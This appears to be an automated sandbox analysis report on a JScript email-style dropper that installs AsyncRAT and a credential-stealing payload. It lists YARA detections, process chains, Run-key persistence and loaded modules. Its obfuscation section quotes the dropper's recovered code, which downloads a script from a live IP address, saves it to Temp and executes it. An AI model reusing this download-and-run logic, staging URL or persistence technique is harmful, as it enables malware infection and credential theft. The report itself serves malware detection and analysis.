              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: GeUT.exe, 00000005.00000002.2743028060.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
              Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org
              Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: places.raw.5.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_see
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://urn.to/r/sds_seeaCould
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://www.ecosia.org/newtab/
              Source: GeUT.exe, 00000005.00000002.2748147670.0000000004021000.00000004.00000800.00020000.00000000.sdmp, tmp4627.tmp.dat.5.dr, tmp5E37.tmp.dat.5.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
              Source: places.raw.5.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: tmp5F14.tmp.dat.5.dr, places.raw.5.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
              Source: GeUT.exe, 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Window created: window name: CLIPBRDWNDCLASS

              System Summary

              Source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
              Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Windows\System32\wscript.exe COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}
              Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
              Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_0082617C NtUnmapViewOfSection,25_2_0082617C
              Source: C:\Users\user\AppData\Roaming\Service.exeCode function: 25_2_00828000 NtUnmapViewOfSection,25_2_00828000
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.h
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile created: C:\Windows\system32\wbem\Performance\WmiApRpl_new.ini
              Source: C:\Windows\System32\wbem\WMIADAP.exeFile deleted: C:\Windows\System32\wbem\Performance\WmiApRpl.h
              Source: 13.2.Service.exe.2e1383c.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2dfd39c.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2e085e0.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.2b17ffc.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 8.2.GeUT.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.2b163a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 4.2.GeUT.exe.2b14768.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.GeUT.exe.2d16a3c.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 5.2.GeUT.exe.78e0000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 5.2.GeUT.exe.78e0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 13.2.Service.exe.2e1383c.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.GeUT.exe.2d14df8.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 7.2.GeUT.exe.2d18698.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2e085e0.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 13.2.Service.exe.2dfd39c.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000008.00000002.1656591343.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000004.00000002.1507678117.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000005.00000002.2754958670.00000000078E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
              Source: 00000007.00000002.1632367681.0000000002CF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000000D.00000002.1706268974.0000000002DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: GeUT.exe.3.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Service.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: GeUT.exe.3.dr, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: Service.exe.4.dr, Program.csCryptographic APIs: 'CreateDecryptor'
              Source: classification engineClassification label: mal100.troj.spyw.evad.winJS@52/22@0/2
              Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\cc[1].js
              Source: C:\Users\user\AppData\Roaming\Service.exeMutant created: NULL
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Flag
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\ADAP_WMI_ENTRY
              Source: C:\Windows\System32\wbem\WMIADAP.exeMutant created: \BaseNamedObjects\Global\RefreshRA_Mutex_Lib
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exeMutant created: \Sessions\1\BaseNamedObjects\wtYmVE2WY2XGhWlO
              Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\OLWJMU.js
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: tmp5FA4.tmp.dat.5.dr, tmp4638.tmp.dat.5.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: ORDER-24930-067548.jsVirustotal: Detection: 30%
              Source: ORDER-24930-067548.jsReversingLabs: Detection: 26%
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\ORDER-24930-067548.js"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\OLWJMU.js"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknown Process created: C:\Users\user\AppData\Local\Temp\GeUT.exe "C:\Users\user\AppData\Local\Temp\GeUT.exe"
              Source: unknown Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Roaming\Service.exe Process created: C:\Users\user\AppData\Roaming\Service.exe "C:\Users\user\AppData\Roaming\Service.exe"
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process created: C:\Windows\System32\wbem\WMIADAP.exe wmiadap.exe /F /T /R
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: dlnashext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wpdshext.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: policymanager.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: msvcp110_win.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
              Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: ntmarta.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: sxs.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mpr.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: scrrun.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: edputil.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: textinputframework.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coreuicomponents.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: coremessaging.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wintypes.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wbemcomn.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: avicap32.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msvfw32.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: winmm.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: dpapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: vaultcli.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: gpapi.dll
              Source: C:\Users\user\AppData\Roaming\Service.exe Section loaded: sspicli.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: mscoree.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: wldp.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: profapi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: amsi.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: userenv.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: msasn1.dll
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Section loaded: gpapi.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIADAP.exe Section loaded: loadperf.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
              Source: C:\Windows\System32\wbem\WMIADAP.exe File written: C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: Binary string: C:\Users\IzzyMichiel\Desktop\The Luck Music\ItselfCrypt-master\Resource\obj\Debug\Resource.pdb source: GeUT.exe, Service.exe (memory dumps)

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Shell");var oRUN = WshShell.Run(filepath);}}catch(e){}
                  IHost.CreateObject("Scripting.FileSystemObject");
                  IFileSystem3.CreateTextFile("Z:\syscalls\9567.js.csv");
                  ITextStream.WriteLine(" entry:1693 f:eval a0:%22try%7B%0Avar%20Object%20%3D%20new%20ActiveXObject(%22MSXML2.XMLHTTP%22)%3B%0AObject.Open(%22GET%22%2C%20%22http%3A%2F%2F192.210.215.11%2Fzoom%2Fcc.js%22%2C%20false)%3B%0AObject.Send()%3B%0Avar%20fso%2");
                  IServerXMLHTTPRequest2.open("GET", "http://192.210.215.11/zoom/cc.js", "false");
                  IServerXMLHTTPRequest2.send();
                  IFileSystem3.GetSpecialFolder("2");
                  IFolder.Path();
                  IServerXMLHTTPRequest2.status();
                  _Stream.Open();
                  _Stream.Type("1");
                  IServerXMLHTTPRequest2.responseBody();
                  _Stream.Write("Unsupported parameter type 00002011");
                  _Stream.Position("0");
                  _Stream.SaveToFile("C:\Users\user\AppData\Local\Temp/OLWJMU.js", "2");
                  _Stream.Close();
                  IWshShell3.Run("C:\Users\user\AppData\Local\Temp/OLWJMU.js")
              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.Sleep(0);WScript.Sleep(1000);ZrshnIkzr = '' XLSJBrjTTVfbj = 60;var umxzSxEEWdqHpaqxQRJlALrQLUdXtWpCGtfawWlRXmBhbCMRsWDEWpjivhoxThKzonAw = 'uQBtgsONJJoIIMeXTlgRJxeOinxqbBsoCPWcUJXebWYltfoHCngDGjnxlmLsuYlIRzGtpBCKNCpnYsVCzqnnVoiTcZrixfjDkQUtYuRAlWqEtzZtRJsEkxmcRmRQKUMhTmCHXbd';EZmCzyeaczyQomfS = 2;var nescldAqRJIlGwRVqfoeyvmdmMoRLDXvnTPdfyraZvkqptTgicaJyAUrrOqZpjeOlNxnhnqrnNFCLwottIiidOwmyXmQISlqQVEcvfyumiWkvSguawfgAwlXQKoJBZjU = 'bOlpsLxNJnwurMrgqrqLmFpUkgMlrotNzBJhgrCOyRWMAqfETHTKjXhWYQEMzMWVuiuqCKzzobNVidUtAHRjViecUmIPmqPmvBSRwpBJITVHJMovwKLrunzLESWQBkMyLbZgLDxKGIbBNWSHyMTbeYrICGNdTlHX';ZrshnIkzr = ZrshnIkzr + '
              Source: GeUT.exe.3.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: 3.2.wscript.exe.1ef379d70e0.1.raw.unpack, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: 3.3.wscript.exe.1ef34fd67e0.0.raw.unpack, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: Service.exe.4.dr, Program.cs .Net Code: MusicPlayer System.Reflection.Assembly.Load(byte[])
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_05D817A7 push 14518905h; ret 5_2_05D819B3
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_06CAC483 push es; iretd 5_2_06CAC484
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07CB801C push es; retf 5_2_07CB7FDF
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Code function: 5_2_07D14838 push esp; ret 5_2_07D14841
              Source: GeUT.exe.3.dr Static PE information: section name: .text entropy: 7.937538668947789
              Source: Service.exe.4.dr Static PE information: section name: .text entropy: 7.937538668947789
              Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\GeUT.exe
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe File created: C:\Users\user\AppData\Roaming\Service.exe

              Boot Survival

              Source: C:\Users\user\AppData\Roaming\Service.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run WindowsUpdate
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Windows
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\497B5ED3636167B0F1E8 436ACE6829F875FEC7CFDC9CAE0283849C6021AF7AE44C96E35989B0FF7E6B20
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\GeUT.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Service.exeProcess information set: NOOPENFILEERRORBOX
